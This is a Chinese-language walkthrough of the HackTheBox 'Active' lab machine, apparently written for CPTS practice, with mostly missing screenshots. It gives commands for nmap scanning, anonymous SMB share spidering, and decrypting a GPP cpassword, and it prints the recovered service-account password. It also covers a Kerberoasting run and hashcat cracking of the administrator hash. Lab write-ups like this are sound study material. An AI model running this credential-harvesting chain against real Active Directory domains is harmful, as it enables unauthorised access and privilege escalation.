当前位置: 首页 > news >正文

CPTS---Active 复现

news 2025/8/19 8:06:54

枚举和利用

nmap -sC -sV -T4 -Pn -n -p- 10.10.10.100

在这里插入图片描述

nmap -Pn -n 10.10.10.100 -sU --top-ports=100 --reason

在这里插入图片描述

与DC核对调整一下时间
rdate -n 10.10.10.100
在这里插入图片描述
匿名枚举smb共享

nxc smb 10.10.10.100 -u '' -p '' --spider Replication --regex . --smb-timeout 10000

在这里插入图片描述
发现Replication可读,列出全部目录,方便查看共享文件
在这里插入图片描述
发现Groups.xml,尝试下载到本地
在这里插入图片描述
查看
在这里插入图片描述
发现一个cpassword的属性很有兴趣,尝试google,可以使用这个工具
在这里插入图片描述
得到密码
在这里插入图片描述
尝试kerberoasting攻击

nxc ldap 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting kerberoasting.out

在这里插入图片描述
得到管理员hash

hashcat -m 13100 hash rockyou.txt

在这里插入图片描述
得到密码。

提权

利用管理员凭证登陆
在这里插入图片描述
成功

http://www.lryc.cn/news/624522.html

相关文章:

  • 如何部署 PHPWind 8.5 UTF8 论坛?从下载到安装全流程(附安装包下载)
  • 20250818在荣品的PRO-RK3566开发板跑Buildroot的时候使用在线秒表https://tool.hiofd.com/stopwatch/
  • Python循环语句 从入门到精通
  • 【运维进阶】LNMP + WordPress 自动化部署实验
  • 第十六届蓝桥杯青少组C++省赛[2025.8.10]第二部分编程题(5、环形取硬币游戏)
  • Baumer高防护相机如何通过YoloV8深度学习模型实现网球运动员和网球速度的检测分析(C#代码UI界面版)
  • Opsqueue:为重负载而生的轻量级批处理队列,已开源!
  • Bellman-Ford与spfa算法简介
  • ARM架构下的cache transient allocation hint以及SMMUv2的TRANSIENTCFG配置详解
  • 大数据时代时序数据库选型指南:深度解析与 Apache IoTDB 实践
  • C++对象的内存布局
  • 一般情况下,python函数都会返回对象,但有时只调用一个函数,这是在修改这个信息
  • 【笔记】扩散模型(一一):Stable Diffusion XL 理论与实现
  • STRIDE威胁模型
  • 图像分类精度评价的方法——误差矩阵、总体精度、用户精度、生产者精度、Kappa 系数
  • 论文阅读 2025-8-9 [DiC, DropKey]
  • promise async await总结
  • linux中的hostpath卷与nfs卷以及静态持久卷的区别
  • 大数据计算引擎(二)——Flink
  • 使用AWS S3 + Lambda + MediaConvert 实现上传视频文件并自动转码
  • 一套GoldenGate → Kafka → Flink → MySQL 的端到端增量同步方案
  • 「Flink」业务搭建方法总结
  • 基于Flink CDC实现联系人与标签数据实时同步至ES的实践
  • Ansible文件部署与大项目多主机管理
  • 大数据开发面试题:美团秋招一面
  • 数据赋能(401)——大数据——持续学习与优化原则
  • 自建K8s集群无缝集成阿里云RAM完整指南
  • The Open Group 休斯敦峰会:进步之路——以开放标准定义未来
  • [openvela] Hello World :从零开始的完整实践与问题复盘
  • PDF转图片需要用到什么技术?苹果手机怎样将PDF转为jpg?